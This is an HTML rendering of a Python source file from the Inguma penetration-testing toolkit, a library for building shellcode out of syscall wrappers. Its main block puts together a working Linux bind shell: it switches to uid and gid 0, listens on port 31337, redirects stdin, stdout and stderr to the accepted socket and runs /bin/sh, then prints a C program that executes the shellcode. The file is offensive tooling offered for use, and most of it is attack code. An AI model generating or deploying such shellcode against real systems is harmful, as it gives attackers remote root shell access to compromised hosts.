1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
|
<html><head><title>/home/joxean/proyectos/tool/lib/pyshellcodelib/pyshellcodelib.py</title></head><body>
<pre>
<a name="1"> 1</a> <span style="color: #800000;">#!/usr/bin/python</span>
<a name="2"> 2</a>
<a name="3"> 3</a> """<span style="color: #006000;"></span>
<a name="4"> 4</a> <span style="color: #006000;">PyShellCode library for Inguma Version 0.0.2</span>
<a name="5"> 5</a> <span style="color: #006000;">A library to write shellcodes coding in python.</span>
<a name="6"> 6</a> <span style="color: #006000;">Copyright (c) 2006, 2007 Joxean Koret, joxeankoret [at] yahoo.es</span>
<a name="7"> 7</a> <span style="color: #006000;"></span>
<a name="8"> 8</a> <span style="color: #006000;">This program is free software; you can redistribute it and/or</span>
<a name="9"> 9</a> <span style="color: #006000;">modify it under the terms of the GNU General Public License</span>
<a name="10"> 10</a> <span style="color: #006000;">as published by the Free Software Foundation; version 2</span>
<a name="11"> 11</a> <span style="color: #006000;">of the License.</span>
<a name="12"> 12</a> <span style="color: #006000;"></span>
<a name="13"> 13</a> <span style="color: #006000;">This program is distributed in the hope that it will be useful,</span>
<a name="14"> 14</a> <span style="color: #006000;">but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<a name="15"> 15</a> <span style="color: #006000;">MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<a name="16"> 16</a> <span style="color: #006000;">GNU General Public License for more details.</span>
<a name="17"> 17</a> <span style="color: #006000;"></span>
<a name="18"> 18</a> <span style="color: #006000;">You should have received a copy of the GNU General Public License</span>
<a name="19"> 19</a> <span style="color: #006000;">along with this program; if not, write to the Free Software</span>
<a name="20"> 20</a> <span style="color: #006000;">Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.</span>
<a name="21"> 21</a> <span style="color: #006000;"></span>"""
<a name="22"> 22</a>
<a name="23"> 23</a> <span style="color: #804000;">import</span> binascii
<a name="24"> 24</a>
<a name="25"> 25</a> <span style="color: #804000;">class</span> <span style="color: #000080;">PyEgg</span>:
<a name="26"> 26</a>
<a name="27"> 27</a> osType = <span style="color: #804000;">None</span>
<a name="28"> 28</a> processor = <span style="color: #804000;">None</span>
<a name="29"> 29</a> buf = "<span style="color: #006000;"></span>"
<a name="30"> 30</a> internal = <span style="color: #804000;">None</span>
<a name="31"> 31</a>
<a name="32"> 32</a> <span style="color: #804000;">def</span> <span style="color: #000080;">__init__</span>(self, mOsType="<span style="color: #006000;">linux</span>", mProcessor="<span style="color: #006000;">x86</span>"):
<a name="33"> 33</a> self.osType = mOsType.lower()
<a name="34"> 34</a> self.processor = mProcessor.lower()
<a name="35"> 35</a>
<a name="36"> 36</a> <span style="color: #804000;">if</span> <span style="color: #804000;">not</span> self.osType.isalnum() <span style="color: #804000;">or</span> <span style="color: #804000;">not</span> self.processor.isalnum:
<a name="37"> 37</a> <span style="color: #804000;">print</span> "<span style="color: #006000;">ERROR: Unacceptable module %s.%s</span>" % (self.osType, self.processor)
<a name="38"> 38</a> <span style="color: #804000;">raise</span>
<a name="39"> 39</a>
<a name="40"> 40</a> <span style="color: #800000;"># FIXME: Horrible hack!</span>
<a name="41"> 41</a> module = "<span style="color: #006000;">import %s.%s as internal</span>" % (self.processor, self.osType)
<a name="42"> 42</a> <span style="color: #804000;">exec</span>(module)
<a name="43"> 43</a>
<a name="44"> 44</a> self.internal = internal
<a name="45"> 45</a>
<a name="46"> 46</a> <span style="color: #804000;">def</span> <span style="color: #000080;">getShellcode</span>(self):
<a name="47"> 47</a> ret = "<span style="color: #006000;"></span>"
<a name="48"> 48</a> <span style="color: #804000;">for</span> c <span style="color: #804000;">in</span> self.buf:
<a name="49"> 49</a> ret += chr(92) + "<span style="color: #006000;">x</span>" + binascii.b2a_hex(c)
<a name="50"> 50</a>
<a name="51"> 51</a> <span style="color: #804000;">return</span> ret
<a name="52"> 52</a>
<a name="53"> 53</a> <span style="color: #804000;">def</span> <span style="color: #000080;">getEgg</span>(self):
<a name="54"> 54</a> <span style="color: #804000;">return</span> self.buf
<a name="55"> 55</a>
<a name="56"> 56</a> <span style="color: #804000;">def</span> <span style="color: #000080;">setuid</span>(self, mid = 0):
<a name="57"> 57</a> self.buf += self.internal.setuid(mid)
<a name="58"> 58</a>
<a name="59"> 59</a> <span style="color: #804000;">def</span> <span style="color: #000080;">setgid</span>(self, mid = 0):
<a name="60"> 60</a> self.buf += self.internal.setgid(mid)
<a name="61"> 61</a>
<a name="62"> 62</a> <span style="color: #804000;">def</span> <span style="color: #000080;">socket</span>(self, adomain, atype, aprotocol=0):
<a name="63"> 63</a> self.buf += self.internal.socket(adomain, atype, aprotocol)
<a name="64"> 64</a>
<a name="65"> 65</a> <span style="color: #804000;">def</span> <span style="color: #000080;">bind</span>(self, aport):
<a name="66"> 66</a> self.buf += self.internal.bind(aport)
<a name="67"> 67</a>
<a name="68"> 68</a> <span style="color: #804000;">def</span> <span style="color: #000080;">listen</span>(self, abacklog=1):
<a name="69"> 69</a> self.buf += self.internal.listen(abacklog)
<a name="70"> 70</a>
<a name="71"> 71</a> <span style="color: #804000;">def</span> <span style="color: #000080;">accept</span>(self):
<a name="72"> 72</a> self.buf += self.internal.accept()
<a name="73"> 73</a>
<a name="74"> 74</a> <span style="color: #804000;">def</span> <span style="color: #000080;">exit</span>(self, retvalue=0):
<a name="75"> 75</a> self.buf += self.internal.exit(retvalue)
<a name="76"> 76</a>
<a name="77"> 77</a> <span style="color: #804000;">def</span> <span style="color: #000080;">close</span>(self, fd=0):
<a name="78"> 78</a> self.buf += self.internal.close(fd)
<a name="79"> 79</a>
<a name="80"> 80</a> <span style="color: #804000;">def</span> <span style="color: #000080;">dup2</span>(self, fd=0):
<a name="81"> 81</a> self.buf += self.internal.dup2(fd)
<a name="82"> 82</a>
<a name="83"> 83</a> <span style="color: #804000;">def</span> <span style="color: #000080;">execSh</span>(self):
<a name="84"> 84</a> self.buf += self.internal.execSh()
<a name="85"> 85</a>
<a name="86"> 86</a> <span style="color: #804000;">if</span> __name__ == "<span style="color: #006000;">__main__</span>":
<a name="87"> 87</a>
<a name="88"> 88</a> <span style="color: #804000;">import</span> socket
<a name="89"> 89</a>
<a name="90"> 90</a> <span style="color: #800000;">#a = PyEgg("openbsd")</span>
<a name="91"> 91</a> a = PyEgg("<span style="color: #006000;">linux</span>")
<a name="92"> 92</a>
<a name="93"> 93</a> <span style="color: #800000;"># Change to root</span>
<a name="94"> 94</a> a.setuid(0)
<a name="95"> 95</a> a.setgid(0)
<a name="96"> 96</a>
<a name="97"> 97</a> <span style="color: #800000;"># Listen in all available addresses at port 31337</span>
<a name="98"> 98</a> a.socket(socket.AF_INET, socket.SOCK_STREAM)
<a name="99"> 99</a> a.bind(31337)
<a name="100"> 100</a> a.listen()
<a name="101"> 101</a>
<a name="102"> 102</a> <span style="color: #800000;"># Got a connection, duplicate fd descriptors</span>
<a name="103"> 103</a> a.accept()
<a name="104"> 104</a> a.dup2(2)
<a name="105"> 105</a> a.dup2(1)
<a name="106"> 106</a> a.dup2(0)
<a name="107"> 107</a>
<a name="108"> 108</a> <span style="color: #800000;"># Run /bin/sh</span>
<a name="109"> 109</a> a.execSh()
<a name="110"> 110</a> sc = a.getShellcode()
<a name="111"> 111</a>
<a name="112"> 112</a> <span style="color: #804000;">print</span> "<span style="color: #006000;">#include <stdio.h></span>"
<a name="113"> 113</a> <span style="color: #804000;">print</span>
<a name="114"> 114</a> <span style="color: #804000;">print</span> '<span style="color: #006000;">char *sc="%s";</span>' % sc
<a name="115"> 115</a> <span style="color: #804000;">print</span>
<a name="116"> 116</a> <span style="color: #804000;">print</span> "<span style="color: #006000;">int main(void) {</span>"
<a name="117"> 117</a> <span style="color: #804000;">print</span> "<span style="color: #006000;">\t((void(*)())sc)();</span>"
<a name="118"> 118</a> <span style="color: #804000;">print</span> "<span style="color: #006000;">}</span>"
<a name="119"> 119</a> <span style="color: #804000;">print</span>
<a name="120"> 120</a>
<a name="121"> 121</a> </pre>
</body></html>
|
